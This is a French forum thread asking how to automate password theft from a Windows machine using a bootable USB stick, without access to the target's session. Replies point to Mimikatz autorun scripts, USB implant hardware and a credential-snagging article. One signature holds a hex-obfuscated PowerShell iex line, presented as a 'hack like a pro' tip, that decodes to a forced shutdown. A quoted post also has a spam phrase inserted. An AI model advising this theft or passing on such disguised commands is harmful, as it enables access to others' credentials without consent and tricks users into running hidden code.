Annonce

Réduire
Aucune annonce.

Aspirateur de mots de passe USB... bootable ?

Réduire
X
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Aspirateur de mots de passe USB... bootable ?

    Bonjour les membres, j'espère que je suis dans la bonne section...

    Je suis tombé sur des tutos qui permettent de créer facilement une clé rootkit aspirant les mots de passe grâce à des logiciels tournant en arrière-plan.

    Autant dire que mon niveau de parano a augmenté d'un cran J'ai donc bricolé un peu une de mes clés pour voir si ça marchait. Et je me suis pris au jeu

    J'ai constaté qu'il y avait un obstacle à l'utilisation de ces gadgets. Je dois être connecté sur ma session et accepter l'autorun pour que cette clé fonctionne.

    Je me suis alors demandé s'il était possible de créer un clé permettant de voler des mots de passe sans avoir besoin de se connecter à la session de l'utilisateur visé.

    Cela ressemblerait à une clé USB bootable avec un programme qui irait directement fouiller les mots de passe sans avoir à lancer la session Windows correspondante.

    Après quelques recherches Google, j'ai pensé qu'il suffisait d'avoir une clé avec Kali, par exemple, ou même juste un Lubuntu et aller ensuite fouiller manuellement dans la partition Windows récupérer les mots de passe là où ils sont stockés.

    Toutefois, il me semble que cette tâche manque de rapidité et d'élégance et qu'elle pourrait être automatisée.

    Qu'en pensez-vous ?

    Merci.

  • #2
    Si l'utilisateur s'est déjà booté c'est faisable en faisant des scripts de lancement automatique de Mimikatz je crois.

    Commentaire


    • #3
      Merci pour l'info ! Toutefois cela nécessite-t-il que l'utilisateur soit loggé ? Je pensais plus à quelque chose qui fonctionnerait à la manière de kon-boot, mais qui irait chercher tous les mots de passe, pas seulement celui de Windows.

      Commentaire


      • #4
        Te faut responder embeded sur un périf USB.

        Genre ça :
        https://inversepath.com/usbarmory

        Ou moins cher (mais potentiellement moins discret) : un raspberry Pi connecté au LAN sur lequel se trouve la machine cible.

        Article intéressant : https://room362.com/post/2016/snaggi...cked-machines/
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          Envoyé par Genzorik Voir le message
          Bonjour les membres, j'espère que je suis dans la bonne section...

          Je suis tombé sur des tutos qui permettent de créer facilement une clé rootkit aspirant les mots de passe grâce à des logiciels tournant en arrière-plan.

          Autant dire que mon niveau de parano a augmenté d'un cran J'ai donc bricolé un peu une de mes clés pour voir si ça marchait. Et je me suis pris au jeu

          J'ai constaté qu'il y avait un obstacle à l'utilisation de ces gadgets. Je dois être connecté sur ma session et accepter l'autorun pour que cette clé fonctionne.
          rembourser crédit
          Je me suis alors demandé s'il était possible de créer un clé permettant de voler des mots de passe sans avoir besoin de se connecter à la session de l'utilisateur visé.

          Cela ressemblerait à une clé USB bootable avec un programme qui irait directement fouiller les mots de passe sans avoir à lancer la session Windows correspondante.

          Après quelques recherches Google, j'ai pensé qu'il suffisait d'avoir une clé avec Kali, par exemple, ou même juste un Lubuntu et aller ensuite fouiller manuellement dans la partition Windows récupérer les mots de passe là où ils sont stockés.

          Toutefois, il me semble que cette tâche manque de rapidité et d'élégance et qu'elle pourrait être automatisée.

          Qu'en pensez-vous ?

          Merci.
          Merci à toi d'avoir partagé ces informations

          Commentaire

          Chargement...
          X